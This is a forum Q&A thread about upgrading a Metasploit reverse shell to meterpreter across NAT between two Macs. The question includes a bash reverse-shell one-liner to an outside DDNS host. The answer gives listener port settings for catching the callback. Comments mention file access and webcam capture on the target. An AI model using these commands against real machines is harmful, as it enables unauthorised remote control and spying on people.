# Upgrade shell to meterpreter behind NAT

Tags: macos, metasploit, meterpreter

I've been playing around with Metasploit the past week, and am **successfully able to obtain a basic shell** of the victim over the internet. I've currently:

- Created a DDNS that points to my public IP
- Set up port forwarding for all the important ports I use (6680, 4433)
- Tested the setup (DDNS and each port) by accessing temporary server hosted on my attacker machine

This image from [Corelan's blog post](https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/) sums up my situation very well:

[image: Scenario]

But when I try to upgrade the shell to a `meterpreter`, either via this command `sessions -u 1` or by manually using the `post/multi/manage/shell_to_meterpreter` module, the shell fails to upgrade.

[image: fails to bind]

It fails to bind to the DDNS / Public IP for obvious reasons and binds to my local network IP or loopback address by default. **This works without any issues when both attacker and target machines are on the same network, but always fails over the internet.**

I just can't understand how to make it work.

---

**Some more details:**

- Both attacker and target machines are Macbooks running OSX 10.10 x64 Yosemite
- Both machines are on completely different networks, each behind a router and a different ISP
- Using Metasploit version `v4.11.4-dev-8a5e45b1`
- Using the `osx/x64/shell_reverse_tcp` payload
- Running this command on the target machine to connect back to the attacker:

  ```
  bash -c "bash -i >& /dev/tcp/my.ddns.host/6680 0>&1 2>&1"
  ```

Comment: Are you root on the box? Also an aside: metasploit is a great framework - but it takes a lot of the hard stuff away to just do things by 'magic'. If you're just learning you would do yourself a favor by learning how that magic works. Open up wireshark on both your machine an the victim (or tcpdump) and watch what is actually happening.

Comment: Yes, root. Anyways, I do plan on learning/understanding the insides of it, but I have to start somewhere. No one can develop a complete website or craft a native application on their day one. They have to start by learning the language and using basic/easy tools.

Comment: Since you're root you should be able to just download the payload from a public IP and execute it as root - and have it connect back to you? Also I wasn't knocking your way of learning - but in general I've found trouble shooting most efficient by starting with lower layers and working up to the application layer

Comment: So if you try your initial reverse shell on that port, does it work?

Comment: @SilverlightFox Yes it works. I can access files, take webcam images and do other tasks (as far as a basic bash shell allows me to do)

Comment: From the screenshot of your msfconsole, I think the problem lies within firewall rules/port forwarding. Have you opened the port on the hosts firewall as well as set up port forwarding on the router?

Comment: Yes, i have. Mentioned that in the question too.

Answer (score 2, accepted):

The comments on your question seem to be rather misleading, or almost irrelevant. I'd ignore them if I were you!

Remember, upgrading the session requires establishing of a new communications session, it doesn't just take over the existing socket.

This looks like the classic scenario of binding to the wrong host or port. For the upgrade to work in the scenario you describe, your firewall needs to forward port `4433` to your attacking machine. If it doesn't, then you simply won't get your reverse connection.

If you have configured your firewall such that the forwarded port is not the same as the one you're binding to, then you have to take another step. For example, if your firewall is configured to forward port `443` to port `4433`, then you need to:

- `set LPORT 443` -- this tells Meterpreter to call back on port `443`.
- `set ReverseListenerBindPort 4433` -- this tells Metasploit to bind to port `4433` instead of `443`.

Unless you have a persistent listener for your initial shell, you can even reuse the same port.

Given that you're using non-standard ports, it could be the the remote firewall is blocking the outbound traffic as well.

I hope that helps.

Comment: Well, this is an old question. I figured out the part about the victim machine also forwarding the port, but since that wasn't easily possible, I had to upgrade to a persistent meterpreter shell the old way; I used the basic shell to manually execute a python meterpreter payload.